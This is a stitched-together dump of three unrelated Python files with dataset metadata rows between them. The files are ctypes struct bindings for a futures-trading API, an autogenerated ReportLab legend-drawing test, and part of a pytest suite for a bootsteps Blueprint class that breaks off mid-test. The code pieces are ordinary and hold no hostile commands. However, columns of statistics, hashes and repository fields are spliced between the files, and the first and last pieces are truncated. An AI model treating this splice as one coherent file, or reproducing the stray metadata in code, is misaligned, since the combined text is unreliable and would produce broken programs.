            ("TradeCode", TradeCode),
            ("BankID", BankID),
            ("BankBranchID", BankBranchID),
            ("BrokerID", BrokerID),
            ("BrokerBranchID", BrokerBranchID),
            ("TradeDate", TradeDate),
            ("TradeTime", TradeTime),
            ("BankSerial", BankSerial),
            ("TradingDay", TradingDay),
            ("LastFragment", LastFragment),
            ("CustomerName", CustomerName),
            ("IdCardType", IdCardType),
            ("IdentifiedCardNo", IdentifiedCardNo),
            ("Gender", Gender),
            ("CountryCode", CountryCode),
            ("CustType", CustType),
            ("Address", Address),
            ("ZipCode", ZipCode),
            ("Telephone", Telephone),
            ("MobilePhone", MobilePhone),
            ("Fax", Fax),
            ("EMail", EMail),
            ("MoneyAccountStatus", MoneyAccountStatus),
            ("BankAccount", BankAccount),
            ("BankPassWord", BankPassWord),
            ("VerifyCertNoFlag", VerifyCertNoFlag),
            ("CurrencyID", CurrencyID),
            ("Digest", Digest),
            ("BankAccType", BankAccType),
            ("BrokerIDByBank", BrokerIDByBank),
            ("ReserveOpenAccStas", ReserveOpenAccStas),
            ("ErrorMsg", ErrorMsg),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        # Numeric fields: stored directly, no encoding.
        for name, number in (
            ("PlateSerial", PlateSerial),
            ("SessionID", SessionID),
            ("InstallID", InstallID),
            ("TID", TID),
            ("ErrorID", ErrorID),
        ):
            if number:
                setattr(self, name, number)
class AccountProperty(Struct):
    """ctypes struct for the AccountProperty record."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("BankID", c_char_Array_4),
        ("BankAccount", c_char_Array_41),
        ("OpenName", c_char_Array_101),
        ("OpenBank", c_char_Array_101),
        ("IsActive", c_int),
        ("AccountSourceType", c_char),
        ("OpenDate", c_char_Array_9),
        ("CancelDate", c_char_Array_9),
        ("OperatorID", c_char_Array_65),
        ("OperateDate", c_char_Array_9),
        ("OperateTime", c_char_Array_9),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, BrokerID=None, AccountID=None, BankID=None, BankAccount=None, OpenName=None, OpenBank=None, IsActive=None, AccountSourceType=None, OpenDate=None, CancelDate=None, OperatorID=None, OperateDate=None, OperateTime=None, CurrencyID=None):
        """Store truthy arguments: strings GBK-encoded, IsActive as-is."""
        super().__init__()
        for name, text in (
            ("BrokerID", BrokerID),
            ("AccountID", AccountID),
            ("BankID", BankID),
            ("BankAccount", BankAccount),
            ("OpenName", OpenName),
            ("OpenBank", OpenBank),
            ("AccountSourceType", AccountSourceType),
            ("OpenDate", OpenDate),
            ("CancelDate", CancelDate),
            ("OperatorID", OperatorID),
            ("OperateDate", OperateDate),
            ("OperateTime", OperateTime),
            ("CurrencyID", CurrencyID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        if IsActive:
            self.IsActive = IsActive
class QryCurrDRIdentity(Struct):
    """ctypes struct for the QryCurrDRIdentity query."""
    _fields_ = [
        ("DRIdentityID", c_int),
    ]
    def __init__(self, DRIdentityID=None):
        """Store DRIdentityID when truthy; otherwise keep the zero default."""
        super().__init__()
        if DRIdentityID:
            setattr(self, "DRIdentityID", DRIdentityID)
class CurrDRIdentity(Struct):
    """ctypes struct for the CurrDRIdentity record."""
    _fields_ = [
        ("DRIdentityID", c_int),
    ]
    def __init__(self, DRIdentityID=None):
        """Store DRIdentityID when truthy; otherwise keep the zero default."""
        super().__init__()
        if DRIdentityID:
            setattr(self, "DRIdentityID", DRIdentityID)
class QrySecAgentCheckMode(Struct):
    """ctypes struct for the QrySecAgentCheckMode query; all fields are GBK text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, InvestorID=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (("BrokerID", BrokerID), ("InvestorID", InvestorID)):
            if text:
                setattr(self, name, text.encode("GBK"))
class QrySecAgentTradeInfo(Struct):
    """ctypes struct for the QrySecAgentTradeInfo query; all fields are GBK text."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("BrokerSecAgentID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, BrokerSecAgentID=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (
            ("BrokerID", BrokerID),
            ("BrokerSecAgentID", BrokerSecAgentID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class UserSystemInfo(Struct):
    """ctypes struct for the UserSystemInfo record."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("ClientSystemInfoLen", c_int),
        ("ClientSystemInfo", c_char_Array_273),
        ("ClientPublicIP", c_char_Array_16),
        ("ClientIPPort", c_int),
        ("ClientLoginTime", c_char_Array_9),
        ("ClientAppID", c_char_Array_33),
    ]
    def __init__(self, BrokerID=None, UserID=None, ClientSystemInfoLen=None, ClientSystemInfo=None, ClientPublicIP=None, ClientIPPort=None, ClientLoginTime=None, ClientAppID=None):
        """Store truthy arguments: strings GBK-encoded, ints as-is."""
        super().__init__()
        for name, text in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("ClientSystemInfo", ClientSystemInfo),
            ("ClientPublicIP", ClientPublicIP),
            ("ClientLoginTime", ClientLoginTime),
            ("ClientAppID", ClientAppID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        for name, number in (
            ("ClientSystemInfoLen", ClientSystemInfoLen),
            ("ClientIPPort", ClientIPPort),
        ):
            if number:
                setattr(self, name, number)
class ReqUserAuthMethod(Struct):
    """ctypes struct for the ReqUserAuthMethod request; all fields are GBK text."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]
    def __init__(self, TradingDay=None, BrokerID=None, UserID=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (
            ("TradingDay", TradingDay),
            ("BrokerID", BrokerID),
            ("UserID", UserID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class RspUserAuthMethod(Struct):
    """ctypes struct for the RspUserAuthMethod response."""
    _fields_ = [
        ("UsableAuthMethod", c_int),
    ]
    def __init__(self, UsableAuthMethod=None):
        """Store UsableAuthMethod when truthy; otherwise keep the zero default."""
        super().__init__()
        if UsableAuthMethod:
            setattr(self, "UsableAuthMethod", UsableAuthMethod)
class ReqGenUserCaptcha(Struct):
    """ctypes struct for the ReqGenUserCaptcha request; all fields are GBK text."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]
    def __init__(self, TradingDay=None, BrokerID=None, UserID=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (
            ("TradingDay", TradingDay),
            ("BrokerID", BrokerID),
            ("UserID", UserID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class RspGenUserCaptcha(Struct):
    """ctypes struct for the RspGenUserCaptcha response."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("CaptchaInfoLen", c_int),
        ("CaptchaInfo", c_char_Array_2561),
    ]
    def __init__(self, BrokerID=None, UserID=None, CaptchaInfoLen=None, CaptchaInfo=None):
        """Store truthy arguments: strings GBK-encoded, the length as-is."""
        super().__init__()
        for name, text in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("CaptchaInfo", CaptchaInfo),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        if CaptchaInfoLen:
            self.CaptchaInfoLen = CaptchaInfoLen
class ReqGenUserText(Struct):
    """ctypes struct for the ReqGenUserText request; all fields are GBK text."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
    ]
    def __init__(self, TradingDay=None, BrokerID=None, UserID=None):
        """GBK-encode and store each truthy string argument; skip the rest."""
        super().__init__()
        for name, text in (
            ("TradingDay", TradingDay),
            ("BrokerID", BrokerID),
            ("UserID", UserID),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
class RspGenUserText(Struct):
    """ctypes struct for the RspGenUserText response."""
    _fields_ = [
        ("UserTextSeq", c_int),
    ]
    def __init__(self, UserTextSeq=None):
        """Store UserTextSeq when truthy; otherwise keep the zero default."""
        super().__init__()
        if UserTextSeq:
            setattr(self, "UserTextSeq", UserTextSeq)
class ReqUserLoginWithCaptcha(Struct):
    """ctypes struct for the ReqUserLoginWithCaptcha request."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("Password", c_char_Array_41),
        ("UserProductInfo", c_char_Array_11),
        ("InterfaceProductInfo", c_char_Array_11),
        ("ProtocolInfo", c_char_Array_11),
        ("MacAddress", c_char_Array_21),
        ("ClientIPAddress", c_char_Array_16),
        ("LoginRemark", c_char_Array_36),
        ("Captcha", c_char_Array_41),
        ("ClientIPPort", c_int),
    ]
    def __init__(self, TradingDay=None, BrokerID=None, UserID=None, Password=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, ClientIPAddress=None, LoginRemark=None, Captcha=None, ClientIPPort=None):
        """Store truthy arguments: strings GBK-encoded, the port as-is."""
        super().__init__()
        for name, text in (
            ("TradingDay", TradingDay),
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("Password", Password),
            ("UserProductInfo", UserProductInfo),
            ("InterfaceProductInfo", InterfaceProductInfo),
            ("ProtocolInfo", ProtocolInfo),
            ("MacAddress", MacAddress),
            ("ClientIPAddress", ClientIPAddress),
            ("LoginRemark", LoginRemark),
            ("Captcha", Captcha),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        if ClientIPPort:
            self.ClientIPPort = ClientIPPort
class ReqUserLoginWithText(Struct):
    """ctypes struct for the ReqUserLoginWithText request."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("Password", c_char_Array_41),
        ("UserProductInfo", c_char_Array_11),
        ("InterfaceProductInfo", c_char_Array_11),
        ("ProtocolInfo", c_char_Array_11),
        ("MacAddress", c_char_Array_21),
        ("ClientIPAddress", c_char_Array_16),
        ("LoginRemark", c_char_Array_36),
        ("Text", c_char_Array_41),
        ("ClientIPPort", c_int),
    ]
    def __init__(self, TradingDay=None, BrokerID=None, UserID=None, Password=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, ClientIPAddress=None, LoginRemark=None, Text=None, ClientIPPort=None):
        """Store truthy arguments: strings GBK-encoded, the port as-is."""
        super().__init__()
        for name, text in (
            ("TradingDay", TradingDay),
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("Password", Password),
            ("UserProductInfo", UserProductInfo),
            ("InterfaceProductInfo", InterfaceProductInfo),
            ("ProtocolInfo", ProtocolInfo),
            ("MacAddress", MacAddress),
            ("ClientIPAddress", ClientIPAddress),
            ("LoginRemark", LoginRemark),
            ("Text", Text),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        if ClientIPPort:
            self.ClientIPPort = ClientIPPort
class ReqUserLoginWithOTP(Struct):
    """ctypes struct for the ReqUserLoginWithOTP request."""
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("Password", c_char_Array_41),
        ("UserProductInfo", c_char_Array_11),
        ("InterfaceProductInfo", c_char_Array_11),
        ("ProtocolInfo", c_char_Array_11),
        ("MacAddress", c_char_Array_21),
        ("ClientIPAddress", c_char_Array_16),
        ("LoginRemark", c_char_Array_36),
        ("OTPPassword", c_char_Array_41),
        ("ClientIPPort", c_int),
    ]
    def __init__(self, TradingDay=None, BrokerID=None, UserID=None, Password=None, UserProductInfo=None, InterfaceProductInfo=None, ProtocolInfo=None, MacAddress=None, ClientIPAddress=None, LoginRemark=None, OTPPassword=None, ClientIPPort=None):
        """Store truthy arguments: strings GBK-encoded, the port as-is."""
        super().__init__()
        for name, text in (
            ("TradingDay", TradingDay),
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("Password", Password),
            ("UserProductInfo", UserProductInfo),
            ("InterfaceProductInfo", InterfaceProductInfo),
            ("ProtocolInfo", ProtocolInfo),
            ("MacAddress", MacAddress),
            ("ClientIPAddress", ClientIPAddress),
            ("LoginRemark", LoginRemark),
            ("OTPPassword", OTPPassword),
        ):
            if text:
                setattr(self, name, text.encode("GBK"))
        if ClientIPPort:
            self.ClientIPPort = ClientIPPort
class ReqApiHandshake(Struct):
    """Handshake request: a single GBK-encoded crypto-key-version string."""
    _fields_ = [
        ("CryptoKeyVersion", c_char_Array_31),
    ]
    def __init__(self, CryptoKeyVersion=None):
        super().__init__()
        # A falsy value keeps the zero-filled ctypes default.
        if CryptoKeyVersion:
            setattr(self, "CryptoKeyVersion", CryptoKeyVersion.encode("GBK"))
class RspApiHandshake(Struct):
    """Handshake response: payload length, GBK-encoded payload, auth flag."""
    _fields_ = [
        ("FrontHandshakeDataLen", c_int),
        ("FrontHandshakeData", c_char_Array_301),
        ("IsApiAuthEnabled", c_int),
    ]
    def __init__(self, FrontHandshakeDataLen=None, FrontHandshakeData=None, IsApiAuthEnabled=None):
        super().__init__()
        # Only the payload is a string and needs encoding; the two ints are
        # stored as-is. Falsy values keep the zero defaults.
        if FrontHandshakeData:
            self.FrontHandshakeData = FrontHandshakeData.encode("GBK")
        for field_name, value in (
            ("FrontHandshakeDataLen", FrontHandshakeDataLen),
            ("IsApiAuthEnabled", IsApiAuthEnabled),
        ):
            if value:
                setattr(self, field_name, value)
class ReqVerifyApiKey(Struct):
    """API-key verification request: payload length plus GBK-encoded payload."""
    _fields_ = [
        ("ApiHandshakeDataLen", c_int),
        ("ApiHandshakeData", c_char_Array_301),
    ]
    def __init__(self, ApiHandshakeDataLen=None, ApiHandshakeData=None):
        super().__init__()
        # The two fields are independent; falsy values keep the zero defaults.
        if ApiHandshakeData:
            self.ApiHandshakeData = ApiHandshakeData.encode("GBK")
        if ApiHandshakeDataLen:
            self.ApiHandshakeDataLen = ApiHandshakeDataLen
class DepartmentUser(Struct):
    """Department-user record; all four fields are GBK-encoded strings."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("InvestorRange", c_char),
        ("InvestorID", c_char_Array_13),
    ]
    def __init__(self, BrokerID=None, UserID=None, InvestorRange=None, InvestorID=None):
        super().__init__()
        # Encode every provided string; falsy values keep the zero defaults.
        for field_name, value in (
            ("BrokerID", BrokerID),
            ("UserID", UserID),
            ("InvestorRange", InvestorRange),
            ("InvestorID", InvestorID),
        ):
            if value:
                setattr(self, field_name, value.encode("GBK"))
class QueryFreq(Struct):
    """Struct holding a single int query-frequency field."""
    _fields_ = [
        ("QueryFreq", c_int),
    ]
    def __init__(self, QueryFreq=None):
        super().__init__()
        # A falsy value (None or 0) keeps the ctypes zero default.
        if QueryFreq:
            setattr(self, "QueryFreq", QueryFreq)
| 38.236336
| 1,215
| 0.616005
| 52,697
| 552,668
| 6.225459
| 0.021292
| 0.045159
| 0.086407
| 0.01529
| 0.907862
| 0.895535
| 0.889122
| 0.876874
| 0.864209
| 0.853909
| 0
| 0.01149
| 0.272153
| 552,668
| 14,453
| 1,216
| 38.238982
| 0.804064
| 0.001247
| 0
| 0.874308
| 0
| 0
| 0.090793
| 0.003796
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026395
| false
| 0.016599
| 0.00015
| 0
| 0.079333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
51acef59bd8970f0eff0cb4af97ae09cdca66646
| 2,847
|
py
|
Python
|
tests/charts-out/test_graphics_charts_legends_sample2c.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | 1
|
2020-05-21T23:34:55.000Z
|
2020-05-21T23:34:55.000Z
|
tests/charts-out/test_graphics_charts_legends_sample2c.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
tests/charts-out/test_graphics_charts_legends_sample2c.py
|
debragail/reportlab-mirror
|
1e5814e1313ed50d5abb65487b207711cb4f7595
|
[
"BSD-3-Clause"
] | null | null | null |
#Autogenerated by ReportLab guiedit do not edit
from reportlab.graphics.shapes import _DrawingEditorMixin, Drawing, Group, Rect, String
from reportlab.lib.colors import Color, CMYKColor, PCMYKColor
class ExplodedDrawing_Drawing(_DrawingEditorMixin,Drawing):
    """Legend sample drawing: seven colour swatches with labels, laid out in
    two columns (x = 20 and x = 80)."""
    def __init__(self,width=200,height=100,*args,**kw):
        Drawing.__init__(self,width,height,*args,**kw)
        self.transform = (1,0,0,1,0,0)
        # (box x, box y, swatch fill colour, label) for each legend entry;
        # the label sits 20pt right of the box and 1.585pt above its base.
        entries = (
            (20, 80, Color(1,0,0,1), 'red'),
            (20, 60, Color(0,.501961,0,1), 'green'),
            (20, 40, Color(0,0,1,1), 'blue'),
            (20, 20, Color(1,1,0,1), 'yellow'),
            (80, 80, Color(1,.752941,.796078,1), 'pink'),
            (80, 60, Color(0,0,0,1), 'black'),
            (80, 40, Color(1,1,1,1), 'white'),
        )
        for box_x, box_y, fill, label in entries:
            self.add(Rect(box_x, box_y, 10, 10, rx=0, ry=0, fillColor=fill,
                          fillOpacity=None, strokeColor=Color(0,0,0,1),
                          strokeWidth=1, strokeLineCap=0, strokeLineJoin=0,
                          strokeMiterLimit=0, strokeDashArray=None,
                          strokeOpacity=None))
            self.add(String(box_x + 20, box_y + 1.585, label,
                            textAnchor='start', fontName='Times-Roman',
                            fontSize=10, fillColor=Color(0,0,0,1)))
if __name__=="__main__": #NORUNTESTS
    # Render the sample legend to ./<classname>.pdf (fnRoot=None uses default naming).
    drawing = ExplodedDrawing_Drawing()
    drawing.save(formats=['pdf'],outDir='.',fnRoot=None)
| 105.444444
| 226
| 0.778012
| 465
| 2,847
| 4.72043
| 0.178495
| 0.03098
| 0.024601
| 0.05467
| 0.784055
| 0.784055
| 0.784055
| 0.784055
| 0.784055
| 0.782232
| 0
| 0.09953
| 0.029505
| 2,847
| 26
| 227
| 109.5
| 0.694897
| 0.01967
| 0
| 0
| 1
| 0
| 0.055934
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.090909
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfc30ca6802807cfa04dde39d0026d4ddcc6ff78
| 19,052
|
py
|
Python
|
tests/test_blueprint.py
|
celery/bootsteps
|
f2e788edb182d54037c5f2b9fad28dc81f701f8e
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_blueprint.py
|
celery/bootsteps
|
f2e788edb182d54037c5f2b9fad28dc81f701f8e
|
[
"BSD-3-Clause"
] | 1
|
2019-10-24T16:46:50.000Z
|
2019-10-24T16:46:50.000Z
|
tests/test_blueprint.py
|
celery/bootsteps
|
f2e788edb182d54037c5f2b9fad28dc81f701f8e
|
[
"BSD-3-Clause"
] | 1
|
2019-09-29T03:36:17.000Z
|
2019-09-29T03:36:17.000Z
|
from unittest.mock import call
import pytest
import trio
from asynctest import MagicMock, Mock
from eliot.testing import LoggedAction, LoggedMessage
from bootsteps import AsyncStep, Blueprint
from bootsteps.blueprint import BlueprintState, ExecutionOrder
from tests.assertions import (
assert_log_message_field_equals,
assert_logged_action_failed,
assert_logged_action_succeeded,
assert_field_equals_in_any_message
)
from tests.mocks import TrioCoroutineMock, create_mock_step, create_start_stop_mock_step
@pytest.fixture
def mock_execution_order_strategy_class():
    """Spec'd MagicMock standing in for the ExecutionOrder strategy class."""
    strategy_class = MagicMock(name="ExecutionOrder", spec_set=ExecutionOrder)
    return strategy_class
@pytest.fixture(autouse=True)
def mock_inspect_isawaitable(mocker):
    """Patch inspect.isawaitable inside bootsteps.blueprint so only
    TrioCoroutineMock instances are treated as awaitable."""
    def _is_awaitable(obj):
        return isinstance(obj, TrioCoroutineMock)
    return mocker.patch(
        "bootsteps.blueprint.inspect.isawaitable",
        side_effect=_is_awaitable,
    )
def assert_parallelized_steps_are_in_order(
    actual_execution_order, expected_execution_order
):
    """Assert *actual_execution_order* is the concatenation of the expected
    groups, where items within a group may appear in any order, and that
    nothing trails the last group."""
    __tracebackhide__ = True
    offset = 0
    for group in expected_execution_order:
        group_size = len(group)
        observed = actual_execution_order[offset:offset + group_size]
        assert sorted(group) == sorted(observed)
        offset += group_size
    # No calls beyond the expected groups.
    assert not actual_execution_order[offset:]
def test_init(bootsteps_graph, mock_execution_order_strategy_class):
    """A freshly constructed Blueprint records its arguments and starts in
    the INITIALIZED state."""
    blueprint = Blueprint(
        bootsteps_graph,
        name="Test",
        execution_order_strategy_class=mock_execution_order_strategy_class,
    )
    assert blueprint.name == "Test"
    assert blueprint.state == BlueprintState.INITIALIZED
    assert blueprint._steps == bootsteps_graph
    assert (
        blueprint.execution_order_strategy_class
        == mock_execution_order_strategy_class
    )
async def test_blueprint_start(
    bootsteps_graph, mock_execution_order_strategy_class, logger
):
    """start() executes each group of steps in order, transitions the state
    channel RUNNING -> COMPLETED, and logs every executed bootstep."""
    # Mixed step kinds: plain callables, start/stop steps, and trio-awaitable
    # steps (TrioCoroutineMock / AsyncStep).
    mock_step1 = create_mock_step("step1")
    mock_step2 = create_start_stop_mock_step("step2")
    mock_step3 = create_mock_step("step3")
    mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
    mock_step5 = create_mock_step("step5")
    mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
    # We're using a parent mock simply to record the order of calls to different
    # steps
    m = Mock()
    m.attach_mock(mock_step1, "mock_step1")
    m.attach_mock(mock_step2, "mock_step2")
    m.attach_mock(mock_step3, "mock_step3")
    m.attach_mock(mock_step4, "mock_step4")
    m.attach_mock(mock_step5, "mock_step5")
    m.attach_mock(mock_step6, "mock_step6")
    # Three sequential groups; steps inside a group may run in parallel.
    expected_execution_order = [
        [m.mock_step1, m.mock_step2],
        [m.mock_step3, m.mock_step4, m.mock_step5],
        [m.mock_step6],
    ]
    mock_iterator = MagicMock()
    mock_iterator.__iter__.return_value = expected_execution_order
    mock_execution_order_strategy_class.return_value = mock_iterator
    blueprint = Blueprint(
        bootsteps_graph,
        name="Test",
        execution_order_strategy_class=mock_execution_order_strategy_class,
    )
    # Drive start() in a nursery and watch the state channel; each receive is
    # bounded by a 1s deadline so a hang fails fast.
    async with trio.open_nursery() as nursery:
        nursery.start_soon(blueprint.start)
        with trio.fail_after(1):
            assert (
                await blueprint.state_changes_receive_channel.receive()
                == BlueprintState.RUNNING
            )
        with trio.fail_after(1):
            assert (
                await blueprint.state_changes_receive_channel.receive()
                == BlueprintState.COMPLETED
            )
    mock_execution_order_strategy_class.assert_called_once_with(blueprint._steps)
    assert_parallelized_steps_are_in_order(
        m.method_calls,
        [
            [call.mock_step1(), call.mock_step2.start()],
            [call.mock_step3(), call.mock_step4.start(), call.mock_step5()],
            [call.mock_step6()],
        ],
    )
    # The awaitable steps must have been awaited, not just called.
    mock_step6.assert_awaited_once_with()
    mock_step4.start.assert_awaited_once_with()
    # Logging: exactly one successful "start" action carrying the blueprint name.
    logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:start")
    assert len(logged_actions) == 1
    logged_action = logged_actions[0]
    assert_log_message_field_equals(logged_action.start_message, "name", blueprint.name)
    assert_logged_action_succeeded(logged_action)
    # One "next_bootsteps" message per group, listing that group's steps.
    messages = LoggedMessage.of_type(
        logger.messages, "bootsteps:blueprint:next_bootsteps"
    )
    assert len(messages) == 3
    assert_log_message_field_equals(messages[0].message, "name", blueprint.name)
    assert_log_message_field_equals(
        messages[0].message, "next_bootsteps", [m.mock_step1, m.mock_step2]
    )
    assert_log_message_field_equals(messages[1].message, "name", blueprint.name)
    assert_log_message_field_equals(
        messages[1].message,
        "next_bootsteps",
        [m.mock_step3, m.mock_step4, m.mock_step5],
    )
    assert_log_message_field_equals(messages[2].message, "name", blueprint.name)
    assert_log_message_field_equals(
        messages[2].message, "next_bootsteps", [m.mock_step6]
    )
    # One successful "executing_bootstep" action per executed step (6 total).
    logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:executing_bootstep")
    assert len(logged_actions) == 6
    start_messages = [logged_action.start_message for logged_action in logged_actions]
    assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step1)
    assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step2.start)
    assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step3)
    assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step4.start)
    assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step5)
    assert_field_equals_in_any_message(start_messages, "bootstep", m.mock_step6)
    assert_logged_action_succeeded(logged_actions[0])
    assert_logged_action_succeeded(logged_actions[1])
    assert_logged_action_succeeded(logged_actions[2])
    assert_logged_action_succeeded(logged_actions[3])
    assert_logged_action_succeeded(logged_actions[4])
    assert_logged_action_succeeded(logged_actions[5])
async def test_blueprint_start_failure(
    bootsteps_graph, mock_execution_order_strategy_class, logger
):
    """If the first step raises, start() stops after the first group, reports
    (FAILED, exc) on the state channel, and later groups never run."""
    mock_step1 = create_mock_step("step1")
    # step1 fails immediately; the exception instance is also what the state
    # channel must carry.
    mock_step1.side_effect = expected_exception = RuntimeError("Expected Failure")
    mock_step2 = create_start_stop_mock_step("step2")
    mock_step3 = create_mock_step("step3")
    mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
    mock_step5 = create_mock_step("step5")
    mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
    # We're using a parent mock simply to record the order of calls to different
    # steps
    m = Mock()
    m.attach_mock(mock_step1, "mock_step1")
    m.attach_mock(mock_step2, "mock_step2")
    m.attach_mock(mock_step3, "mock_step3")
    m.attach_mock(mock_step4, "mock_step4")
    m.attach_mock(mock_step5, "mock_step5")
    m.attach_mock(mock_step6, "mock_step6")
    expected_execution_order = [
        [m.mock_step1, m.mock_step2],
        [m.mock_step3, m.mock_step4, m.mock_step5],
        [m.mock_step6],
    ]
    mock_iterator = MagicMock()
    mock_iterator.__iter__.return_value = expected_execution_order
    mock_execution_order_strategy_class.return_value = mock_iterator
    blueprint = Blueprint(
        bootsteps_graph,
        name="Test",
        execution_order_strategy_class=mock_execution_order_strategy_class,
    )
    # The nursery re-raises the step's RuntimeError once its tasks finish.
    with pytest.raises(RuntimeError):
        async with trio.open_nursery() as nursery:
            nursery.start_soon(blueprint.start)
            with trio.fail_after(1):
                assert (
                    await blueprint.state_changes_receive_channel.receive()
                    == BlueprintState.RUNNING
                )
            with trio.fail_after(1):
                assert await blueprint.state_changes_receive_channel.receive() == (
                    BlueprintState.FAILED,
                    expected_exception,
                )
    mock_execution_order_strategy_class.assert_called_once_with(blueprint._steps)
    # Only the first group ran before the failure aborted execution.
    assert_parallelized_steps_are_in_order(
        m.method_calls, [[call.mock_step1(), call.mock_step2.start()]]
    )
    mock_step3.assert_not_called()
    mock_step4.start.assert_not_called()
    mock_step5.assert_not_called()
    mock_step6.assert_not_called()
    # The overall "start" action is logged as failed.
    logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:start")
    assert len(logged_actions) == 1
    logged_action = logged_actions[0]
    assert_log_message_field_equals(logged_action.start_message, "name", blueprint.name)
    assert_logged_action_failed(logged_action)
    messages = LoggedMessage.of_type(
        logger.messages, "bootsteps:blueprint:next_bootsteps"
    )
    assert len(messages) == 1
    assert_log_message_field_equals(messages[0].message, "name", blueprint.name)
    assert_log_message_field_equals(
        messages[0].message, "next_bootsteps", [m.mock_step1, m.mock_step2]
    )
    logged_actions = LoggedAction.of_type(logger.messages, "bootsteps:blueprint:executing_bootstep")
    assert len(logged_actions) == 2
    # NOTE(review): clearing the side effect here looks like leftover cleanup
    # before the remaining log assertions — confirm it is still needed.
    mock_step1.side_effect = None
    assert_log_message_field_equals(logged_actions[0].start_message, "bootstep", m.mock_step1)
    assert_logged_action_failed(logged_actions[0])
    assert_log_message_field_equals(logged_actions[1].start_message, "bootstep", m.mock_step2.start)
    assert_logged_action_succeeded(logged_actions[1])
async def test_blueprint_stop(
    bootsteps_graph, mock_execution_order_strategy_class, logger
):
    """stop() walks the execution order in reverse, calls stop() only on
    start/stop steps, and transitions TERMINATING -> TERMINATED."""
    mock_step1 = create_mock_step("step1")
    mock_step2 = create_start_stop_mock_step("step2")
    mock_step3 = create_mock_step("step3")
    mock_step4 = create_start_stop_mock_step("step4", mock_class=TrioCoroutineMock)
    mock_step5 = create_mock_step("step5")
    mock_step6 = create_mock_step("step6", spec=AsyncStep, mock_class=TrioCoroutineMock)
    # We're using a parent mock simply to record the order of calls to different
    # steps
    m = Mock()
    m.attach_mock(mock_step1, "mock_step1")
    m.attach_mock(mock_step2, "mock_step2")
    m.attach_mock(mock_step3, "mock_step3")
    m.attach_mock(mock_step4, "mock_step4")
